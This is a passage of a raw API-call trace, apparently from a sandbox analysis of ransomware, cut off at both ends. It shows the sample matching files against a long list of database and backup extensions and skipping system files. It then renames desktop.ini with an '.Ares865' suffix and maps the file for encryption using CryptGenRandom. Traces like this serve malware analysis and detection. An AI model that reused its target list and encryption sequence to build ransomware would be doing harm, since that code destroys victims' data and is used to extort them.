lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0067.527] lstrlenW (lpString="db3") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0067.527] lstrlenW (lpString="dbf") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0067.527] lstrlenW (lpString="mdf") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0067.527] lstrlenW (lpString="mdb") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0067.527] lstrlenW (lpString="sql") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0067.527] lstrlenW (lpString="sqlite") returned 6 [0067.527] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0067.527] lstrlenW (lpString="sqlite3") returned 7 [0067.527] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0067.527] lstrlenW (lpString="sqlitedb") returned 8 [0067.527] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0067.527] lstrlenW (lpString="xml") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0067.527] lstrlenW (lpString="$er") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0067.527] lstrlenW (lpString="4dd") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0067.527] lstrlenW (lpString="4dl") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0067.527] lstrlenW (lpString="^^^") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0067.527] lstrlenW (lpString="abs") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0067.527] lstrlenW (lpString="abx") returned 3 [0067.527] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0067.527] lstrlenW (lpString="accdb") returned 5 [0067.527] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0067.527] lstrlenW (lpString="accdc") returned 5 [0067.527] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0067.527] lstrlenW (lpString="accde") returned 5 [0067.527] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0067.527] lstrlenW (lpString="accdr") returned 5 [0067.527] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0067.528] lstrlenW (lpString="accdt") returned 5 [0067.528] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0067.528] lstrlenW (lpString="accdw") returned 5 [0067.528] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0067.528] lstrlenW (lpString="accft") returned 5 [0067.528] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0067.528] lstrlenW (lpString="adb") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0067.528] lstrlenW (lpString="adb") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0067.528] lstrlenW (lpString="ade") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0067.528] lstrlenW (lpString="adf") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0067.528] lstrlenW (lpString="adn") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0067.528] lstrlenW (lpString="adp") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0067.528] lstrlenW (lpString="alf") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0067.528] lstrlenW (lpString="ask") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0067.528] lstrlenW (lpString="btr") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0067.528] lstrlenW (lpString="cat") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0067.528] lstrlenW (lpString="cdb") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0067.528] lstrlenW (lpString="ckp") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0067.528] lstrlenW (lpString="cma") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0067.528] lstrlenW (lpString="cpd") returned 3 [0067.528] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0067.528] lstrlenW (lpString="dacpac") returned 6 [0067.528] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0067.528] lstrlenW (lpString="dad") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0067.529] lstrlenW (lpString="dadiagrams") returned 10 [0067.529] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0067.529] lstrlenW (lpString="daschema") returned 8 [0067.529] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0067.529] lstrlenW (lpString="db-journal") returned 10 [0067.529] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0067.529] lstrlenW (lpString="db-shm") returned 6 [0067.529] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0067.529] lstrlenW (lpString="db-wal") returned 6 [0067.529] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0067.529] lstrlenW (lpString="dbc") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0067.529] lstrlenW (lpString="dbs") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0067.529] lstrlenW (lpString="dbt") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0067.529] lstrlenW (lpString="dbv") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0067.529] lstrlenW (lpString="dbx") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0067.529] lstrlenW (lpString="dcb") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0067.529] lstrlenW (lpString="dct") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0067.529] lstrlenW (lpString="dcx") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0067.529] lstrlenW (lpString="ddl") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0067.529] lstrlenW (lpString="dlis") returned 4 [0067.529] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0067.529] lstrlenW (lpString="dp1") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0067.529] lstrlenW (lpString="dqy") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0067.529] lstrlenW (lpString="dsk") returned 3 [0067.529] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0067.529] lstrlenW (lpString="dsn") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0067.530] lstrlenW (lpString="dtsx") returned 4 [0067.530] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0067.530] lstrlenW (lpString="dxl") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0067.530] lstrlenW (lpString="eco") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0067.530] lstrlenW (lpString="ecx") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0067.530] lstrlenW (lpString="edb") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0067.530] lstrlenW (lpString="epim") returned 4 [0067.530] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0067.530] lstrlenW (lpString="fcd") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0067.530] lstrlenW (lpString="fdb") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0067.530] lstrlenW (lpString="fic") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0067.530] lstrlenW (lpString="flexolibrary") returned 12 [0067.530] lstrlenW (lpString="fm5") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0067.530] lstrlenW (lpString="fmp") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0067.530] lstrlenW (lpString="fmp12") returned 5 [0067.530] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0067.530] lstrlenW (lpString="fmpsl") returned 5 [0067.530] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0067.530] lstrlenW (lpString="fol") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0067.530] lstrlenW (lpString="fp3") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0067.530] lstrlenW (lpString="fp4") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0067.530] lstrlenW (lpString="fp5") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0067.530] lstrlenW (lpString="fp7") returned 3 [0067.530] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0067.531] lstrlenW (lpString="fpt") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0067.531] lstrlenW (lpString="frm") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0067.531] lstrlenW (lpString="gdb") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0067.531] lstrlenW (lpString="gdb") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0067.531] lstrlenW (lpString="grdb") returned 4 [0067.531] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0067.531] lstrlenW (lpString="gwi") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0067.531] lstrlenW (lpString="hdb") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0067.531] lstrlenW (lpString="his") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0067.531] lstrlenW (lpString="ib") returned 2 [0067.531] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0067.531] lstrlenW (lpString="idb") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0067.531] lstrlenW (lpString="ihx") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0067.531] lstrlenW (lpString="itdb") returned 4 [0067.531] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0067.531] lstrlenW (lpString="itw") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0067.531] lstrlenW (lpString="jet") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0067.531] lstrlenW (lpString="jtx") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0067.531] lstrlenW (lpString="kdb") returned 3 [0067.531] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0067.531] lstrlenW (lpString="kexi") returned 4 [0067.531] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0067.531] lstrlenW (lpString="kexic") returned 5 [0067.531] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0067.531] lstrlenW (lpString="kexis") returned 5 [0067.532] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0067.532] lstrlenW (lpString="lgc") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0067.532] lstrlenW (lpString="lwx") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0067.532] lstrlenW (lpString="maf") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0067.532] lstrlenW (lpString="maq") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0067.532] lstrlenW (lpString="mar") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0067.532] lstrlenW (lpString="marshal") returned 7 [0067.532] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0067.532] lstrlenW (lpString="mas") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0067.532] lstrlenW (lpString="mav") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0067.532] lstrlenW (lpString="maw") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0067.532] lstrlenW (lpString="mdbhtml") returned 7 [0067.532] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0067.532] lstrlenW (lpString="mdn") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0067.532] lstrlenW (lpString="mdt") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0067.532] lstrlenW (lpString="mfd") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0067.532] lstrlenW (lpString="mpd") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0067.532] lstrlenW (lpString="mrg") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0067.532] lstrlenW (lpString="mud") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0067.532] lstrlenW (lpString="mwb") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0067.532] lstrlenW (lpString="myd") returned 3 [0067.532] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0067.532] lstrlenW (lpString="ndf") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0067.533] lstrlenW (lpString="nnt") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0067.533] lstrlenW (lpString="nrmlib") returned 6 [0067.533] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0067.533] lstrlenW (lpString="ns2") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0067.533] lstrlenW (lpString="ns3") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0067.533] lstrlenW (lpString="ns4") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0067.533] lstrlenW (lpString="nsf") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0067.533] lstrlenW (lpString="nv") returned 2 [0067.533] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0067.533] lstrlenW (lpString="nv2") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0067.533] lstrlenW (lpString="nwdb") returned 4 [0067.533] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0067.533] lstrlenW (lpString="nyf") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0067.533] lstrlenW (lpString="odb") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0067.533] lstrlenW (lpString="odb") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0067.533] lstrlenW (lpString="oqy") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0067.533] lstrlenW (lpString="ora") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0067.533] lstrlenW (lpString="orx") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0067.533] lstrlenW (lpString="owc") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0067.533] lstrlenW (lpString="p96") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0067.533] lstrlenW (lpString="p97") returned 3 [0067.533] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0067.534] lstrlenW (lpString="pan") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0067.534] lstrlenW (lpString="pdb") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0067.534] lstrlenW (lpString="pdm") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0067.534] lstrlenW (lpString="pnz") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0067.534] lstrlenW (lpString="qry") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0067.534] lstrlenW (lpString="qvd") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0067.534] lstrlenW (lpString="rbf") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0067.534] lstrlenW (lpString="rctd") returned 4 [0067.534] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0067.534] lstrlenW (lpString="rod") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0067.534] lstrlenW (lpString="rodx") returned 4 [0067.534] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0067.534] lstrlenW (lpString="rpd") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0067.534] lstrlenW (lpString="rsd") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0067.534] lstrlenW (lpString="sas7bdat") returned 8 [0067.534] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0067.534] lstrlenW (lpString="sbf") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0067.534] lstrlenW (lpString="scx") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0067.534] lstrlenW (lpString="sdb") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0067.534] lstrlenW (lpString="sdc") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0067.534] lstrlenW (lpString="sdf") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0067.534] lstrlenW (lpString="sis") returned 3 [0067.534] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0067.535] lstrlenW (lpString="spq") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0067.535] lstrlenW (lpString="te") returned 2 [0067.535] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0067.535] lstrlenW (lpString="teacher") returned 7 [0067.535] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0067.535] lstrlenW (lpString="tmd") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0067.535] lstrlenW (lpString="tps") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0067.535] lstrlenW (lpString="trc") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0067.535] lstrlenW (lpString="trc") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0067.535] lstrlenW (lpString="trm") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0067.535] lstrlenW (lpString="udb") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0067.535] lstrlenW (lpString="udl") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0067.535] lstrlenW (lpString="usr") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0067.535] lstrlenW (lpString="v12") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0067.535] lstrlenW (lpString="vis") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0067.535] lstrlenW (lpString="vpd") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0067.535] lstrlenW (lpString="vvv") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0067.535] lstrlenW (lpString="wdb") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0067.535] lstrlenW (lpString="wmdb") returned 4 [0067.535] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0067.535] lstrlenW (lpString="wrk") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0067.535] lstrlenW (lpString="xdb") returned 3 [0067.535] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0067.536] lstrlenW (lpString="xld") returned 3 [0067.536] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0067.536] lstrlenW (lpString="xmlff") returned 5 [0067.536] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0067.536] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\desktop.ini.Ares865") returned 64 [0067.536] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\games\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\games\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0067.536] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\games\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.537] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=520) returned 1 [0067.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.537] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.538] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.538] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.538] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x510, lpName=0x0) returned 0x154 [0067.539] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x510) returned 0x190000 [0067.539] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.540] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.540] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.541] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.541] CloseHandle (hObject=0x154) returned 1 [0067.541] CloseHandle (hObject=0x12c) returned 1 [0067.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.542] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db22b28, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x3db22b28, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x3db94f49, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x102, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GameExplorer.lnk", cAlternateFileName="GAMEEX~1.LNK")) returned 1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="aoldtz.exe") returned 1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2=".") returned 1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="..") returned 1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="windows") returned -1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="bootmgr") returned 1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="temp") returned -1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="pagefile.sys") returned -1 [0067.542] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="boot") returned 1 [0067.543] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="ids.txt") returned -1 [0067.543] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="ntuser.dat") returned -1 [0067.543] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="perflogs") returned -1 [0067.543] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2="MSBuild") returned -1 [0067.543] lstrlenW (lpString="GameExplorer.lnk") returned 16 [0067.543] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\desktop.ini") returned 56 [0067.543] lstrcpyW (in: lpString1=0x2cce45a, lpString2="GameExplorer.lnk" | out: lpString1="GameExplorer.lnk") returned="GameExplorer.lnk" [0067.543] lstrlenW (lpString="GameExplorer.lnk") returned 16 [0067.543] lstrlenW (lpString="Ares865") returned 7 [0067.543] lstrcmpiW (lpString1="rer.lnk", lpString2="Ares865") returned 1 [0067.543] lstrlenW (lpString=".dll") returned 4 [0067.543] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2=".dll") returned 1 [0067.543] lstrlenW (lpString=".lnk") returned 4 [0067.543] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2=".lnk") returned 1 [0067.543] lstrlenW (lpString=".ini") returned 4 [0067.543] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2=".ini") returned 1 [0067.543] lstrlenW (lpString=".sys") returned 4 [0067.543] lstrcmpiW (lpString1="GameExplorer.lnk", lpString2=".sys") returned 1 [0067.543] lstrlenW (lpString="GameExplorer.lnk") returned 16 [0067.543] lstrlenW (lpString="bak") returned 3 [0067.543] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.543] lstrlenW (lpString="ba_") returned 3 [0067.543] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.543] lstrlenW (lpString="dbb") returned 3 [0067.543] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.543] lstrlenW (lpString="vmdk") returned 4 [0067.543] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.543] lstrlenW (lpString="rar") returned 3 [0067.543] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.543] lstrlenW (lpString="zip") returned 3 [0067.543] 